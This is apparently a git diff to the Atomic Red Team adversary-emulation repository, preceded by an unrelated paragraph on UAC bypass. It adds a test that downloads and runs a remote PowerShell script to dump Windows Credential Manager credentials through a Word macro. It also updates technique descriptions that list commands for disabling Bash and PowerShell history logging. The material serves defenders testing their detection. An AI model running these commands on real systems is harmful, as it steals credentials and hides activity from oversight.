Adversaries may bypass UAC mechanisms to elevate process privileges on system. Windows User Account Control (UAC) allows a program to elevate its privileges (tracked as integrity levels ranging from low to high) to perform a task under administrator-level permissions, possibly by prompting the user for confirmation. The impact to the user ranges from denying the operation under high enforcement to allowing the user to perform the action if they are in the local administrators group and click through the prompt or allowing them to enter an administrator password to complete the action. (Citation: TechNet How UAC Works)
diff --git a/atomics/T1555/T1555.md b/atomics/T1555/T1555.md
new file mode 100644
index 00000000..284b4305
--- /dev/null
+++ b/atomics/T1555/T1555.md
@@ -0,0 +1,55 @@
+# T1555 - Credentials from Password Stores
+## [Description from ATT&CK](https://attack.mitre.org/techniques/T1555)
+Adversaries may search for common password storage locations to obtain user credentials. Passwords are stored in several places on a system, depending on the operating system or application holding the credentials. There are also specific applications that store passwords to make it easier for users manage and maintain. Once credentials are obtained, they can be used to perform lateral movement and access restricted information.
+
+## Atomic Tests
+
+- [Atomic Test #1 - Extract Windows Credential Manager via VBA](#atomic-test-1---extract-windows-credential-manager-via-vba)
+
+
+
+
+## Atomic Test #1 - Extract Windows Credential Manager via VBA
+This module will extract the credentials found within the Windows credential manager and dump
+them to $env:TEMP\windows-credentials.txt
+
+**Supported Platforms:** Windows
+
+
+
+
+
+#### Attack Commands: Run with `powershell`!
+
+
+```powershell
+IEX (iwr "https://raw.githubusercontent.com/redcanaryco/invoke-atomicredteam/master/Public/Invoke-MalDoc.ps1")
+Invoke-Maldoc -macroFile "PathToAtomicsFolder\T1555\src\T1555-macrocode.txt" -officeProduct "Word" -sub "Extract"
+```
+
+#### Cleanup Commands:
+```powershell
+Remove-Item "$env:TEMP\windows-credentials.txt" -ErrorAction Ignore
+```
+
+
+
+#### Dependencies: Run with `powershell`!
+##### Description: Microsoft Word must be installed
+##### Check Prereq Commands:
+```powershell
+try {
+ New-Object -COMObject "word.Application" | Out-Null
+ Stop-Process -Name $process
+ exit 0
+} catch { exit 1 }
+```
+##### Get Prereq Commands:
+```powershell
+Write-Host "You will need to install Microsoft Word manually to meet this requirement"
+```
+
+
+
+
+
diff --git a/atomics/T1555/T1555.yaml b/atomics/T1555/T1555.yaml
index ad1785e4..e292adfb 100644
--- a/atomics/T1555/T1555.yaml
+++ b/atomics/T1555/T1555.yaml
@@ -2,7 +2,7 @@ attack_technique: T1555
display_name: 'Credentials from Password Stores'
atomic_tests:
- name: Extract Windows Credential Manager via VBA
- auto_generated_guid:
+ auto_generated_guid: 234f9b7c-b53d-4f32-897b-b880a6c9ea7b
description: |
This module will extract the credentials found within the Windows credential manager and dump
them to $env:TEMP\windows-credentials.txt
diff --git a/atomics/T1562.003/T1562.003.md b/atomics/T1562.003/T1562.003.md
index 84bd6076..5bce4173 100644
--- a/atomics/T1562.003/T1562.003.md
+++ b/atomics/T1562.003/T1562.003.md
@@ -1,10 +1,12 @@
-# T1562.003 - HISTCONTROL
+# T1562.003 - Impair Command History Logging
## [Description from ATT&CK](https://attack.mitre.org/techniques/T1562/003)
-Adversaries may configure HISTCONTROL to not log all command history. The HISTCONTROL environment variable keeps track of what should be saved by the history command and eventually into the ~/.bash_history file when a user logs out. HISTCONTROL does not exist by default on macOS, but can be set by the user and will be respected.
+Adversaries may impair command history logging to hide commands they run on a compromised system. Various command interpreters keep track of the commands users type in their terminal so that users can retrace what they've done.
-This setting can be configured to ignore commands that start with a space by simply setting it to "ignorespace". HISTCONTROL can also be set to ignore duplicate commands by setting it to "ignoredups". In some Linux systems, this is set by default to "ignoreboth" which covers both of the previous examples. This means that “ ls” will not be saved, but “ls” would be saved by history.
+On Linux and macOS, command history is tracked in a file pointed to by the environment variable HISTFILE. When a user logs off a system, this information is flushed to a file in the user's home directory called ~/.bash_history. The HISTCONTROL environment variable keeps track of what should be saved by the history command and eventually into the ~/.bash_history file when a user logs out. HISTCONTROL does not exist by default on macOS, but can be set by the user and will be respected.
- Adversaries can abuse this to operate without leaving traces by simply prepending a space to all of their terminal commands.
+Adversaries may clear the history environment variable (unset HISTFILE) or set the command history size to zero (export HISTFILESIZE=0) to prevent logging of commands. Additionally, HISTCONTROL can be configured to ignore commands that start with a space by simply setting it to "ignorespace". HISTCONTROL can also be set to ignore duplicate commands by setting it to "ignoredups". In some Linux systems, this is set by default to "ignoreboth" which covers both of the previous examples. This means that “ ls” will not be saved, but “ls” would be saved by history. Adversaries can abuse this to operate without leaving traces by simply prepending a space to all of their terminal commands.
+
+On Windows systems, the PSReadLine module tracks commands used in all PowerShell sessions and writes them to a file ($env:APPDATA\Microsoft\Windows\PowerShell\PSReadLine\ConsoleHost_history.txt by default). Adversaries may change where these logs are saved using Set-PSReadLineOption -HistorySavePath {File Path}. This will cause ConsoleHost_history.txt to stop receiving logs. Additionally, it is possible to turn off logging to this file using the PowerShell command Set-PSReadlineOption -HistorySaveStyle SaveNothing.(Citation: Microsoft PowerShell Command History)(Citation: Sophos PowerShell command audit)(Citation: Sophos PowerShell Command History Forensics)
## Atomic Tests
diff --git a/atomics/T1566.001/T1566.001.md b/atomics/T1566.001/T1566.001.md
index dc142392..f647d9b2 100644
--- a/atomics/T1566.001/T1566.001.md
+++ b/atomics/T1566.001/T1566.001.md
@@ -1,6 +1,6 @@
# T1566.001 - Spearphishing Attachment
## [Description from ATT&CK](https://attack.mitre.org/techniques/T1566/001)
-Adversaries may send spearphishing emails with a malicious attachment in an attempt to elicit sensitive information and/or gain access to victim systems. Spearphishing attachment is a specific variant of spearphishing. Spearphishing attachment is different from other forms of spearphishing in that it employs the use of malware attached to an email. All forms of spearphishing are electronically delivered social engineering targeted at a specific individual, company, or industry. In this scenario, adversaries attach a file to the spearphishing email and usually rely upon [User Execution](https://attack.mitre.org/techniques/T1204) to gain execution.
+Adversaries may send spearphishing emails with a malicious attachment in an attempt to gain access to victim systems. Spearphishing attachment is a specific variant of spearphishing. Spearphishing attachment is different from other forms of spearphishing in that it employs the use of malware attached to an email. All forms of spearphishing are electronically delivered social engineering targeted at a specific individual, company, or industry. In this scenario, adversaries attach a file to the spearphishing email and usually rely upon [User Execution](https://attack.mitre.org/techniques/T1204) to gain execution.
There are many options for the attachment such as Microsoft Office documents, executables, PDFs, or archived files. Upon opening the attachment (and potentially clicking past protections), the adversary's payload exploits a vulnerability or directly executes on the user's system. The text of the spearphishing email usually tries to give a plausible reason why the file should be opened, and may explain how to bypass system protections in order to do so. The email may also contain instructions on how to decrypt an attachment, such as a zip file password, in order to evade email boundary defenses. Adversaries frequently manipulate file extensions and icons in order to make attached executables appear to be document files, or files exploiting one application appear to be a file for a different one.
diff --git a/atomics/T1574.012/T1574.012.md b/atomics/T1574.012/T1574.012.md
index db753b19..b84c5d66 100644
--- a/atomics/T1574.012/T1574.012.md
+++ b/atomics/T1574.012/T1574.012.md
@@ -4,7 +4,7 @@
The COR_PROFILER environment variable can be set at various scopes (system, user, or process) resulting in different levels of influence. System and user-wide environment variable scopes are specified in the Registry, where a [Component Object Model](https://attack.mitre.org/techniques/T1559/001) (COM) object can be registered as a profiler DLL. A process scope COR_PROFILER can also be created in-memory without modifying the Registry. Starting with .NET Framework 4, the profiling DLL does not need to be registered as long as the location of the DLL is specified in the COR_PROFILER_PATH environment variable.(Citation: Microsoft COR_PROFILER Feb 2013)
-Adversaries may abuse COR_PROFILER to establish persistence that executes a malicious DLL in the context of all .NET processes every time the CLR is invoked. The COR_PROFILER can also be used to elevate privileges (ex: [Bypass User Access Control](https://attack.mitre.org/techniques/T1548/002)) if the victim .NET process executes at a higher permission level, as well as to hook and [Impair Defenses](https://attack.mitre.org/techniques/T1562) provided by .NET processes.(Citation: RedCanary Mockingbird May 2020)(Citation: Red Canary COR_PROFILER May 2020)(Citation: Almond COR_PROFILER Apr 2019)(Citation: GitHub OmerYa Invisi-Shell)(Citation: subTee .NET Profilers May 2017)
+Adversaries may abuse COR_PROFILER to establish persistence that executes a malicious DLL in the context of all .NET processes every time the CLR is invoked. The COR_PROFILER can also be used to elevate privileges (ex: [Bypass User Account Control](https://attack.mitre.org/techniques/T1548/002)) if the victim .NET process executes at a higher permission level, as well as to hook and [Impair Defenses](https://attack.mitre.org/techniques/T1562) provided by .NET processes.(Citation: RedCanary Mockingbird May 2020)(Citation: Red Canary COR_PROFILER May 2020)(Citation: Almond COR_PROFILER Apr 2019)(Citation: GitHub OmerYa Invisi-Shell)(Citation: subTee .NET Profilers May 2017)
## Atomic Tests
diff --git a/atomics/used_guids.txt b/atomics/used_guids.txt
index 0003e3ee..8b98a0c9 100644
--- a/atomics/used_guids.txt
+++ b/atomics/used_guids.txt
@@ -627,3 +627,11 @@ f38e9eea-e1d7-4ba6-b716-584791963827
9a2915b3-3954-4cce-8c76-00fbf4dbd014
e8209d5f-e42d-45e6-9c2f-633ac4f1eefa
4ea1fc97-8a46-4b4e-ba48-af43d2a98052
+ecd3fa21-7792-41a2-8726-2c5c673414d3
+3ad4a037-1598-4136-837c-4027e4fa319b
+1c91e740-1729-4329-b779-feba6e71d048
+8faff437-a114-4547-9a60-749652a03df6
+9c8d5a72-9c98-48d3-b9bf-da2cc43bdf52
+234f9b7c-b53d-4f32-897b-b880a6c9ea7b
+7cbb0f26-a4c1-4f77-b180-a009aa05637e
+4cc40fd7-87b8-4b16-b2d7-57534b86b911
diff --git a/docs/maintainers.md b/docs/maintainers.md
index 832d2d60..56ed282e 100644
--- a/docs/maintainers.md
+++ b/docs/maintainers.md
@@ -21,11 +21,15 @@ Any breaking change or major feature should be communicated to the community via
# Maintainers Meeting Cadence
## Sync Meetings
-1. Review any issues labeled `maintainers` and make or plan decisions accordingly.
-2. Review Atomic Friday schedule and assign related tasks as needed.
-2. Open discussion
+Sync meetings are more frequent and less formal, and may be conducted via Zoom, Slack, or email depending on the nature of issues to be discussed. Items that are commonly raised during sync meetings include:
+
+1. Progress or communications related to milestones
+1. Issues labeled `maintainers` or that are otherwise blocked
+2. Time-sensitive decisions that need to be made
## Planning Meetings
-1. Review existing milestones and progress.
-2. Identify future milestones.
-3. Prioritize and tentatively schedule future milestones (i.e., update the roadmap).
+Planning meetings are less frequent, and minutes will be kept and published via GitHub. These meetings are conducted via Zoom, and require that a majority of the core maintainers team be present.
+
+1. Review existing milestones and progress
+2. Identify future milestones
+3. Prioritize and tentatively schedule future milestones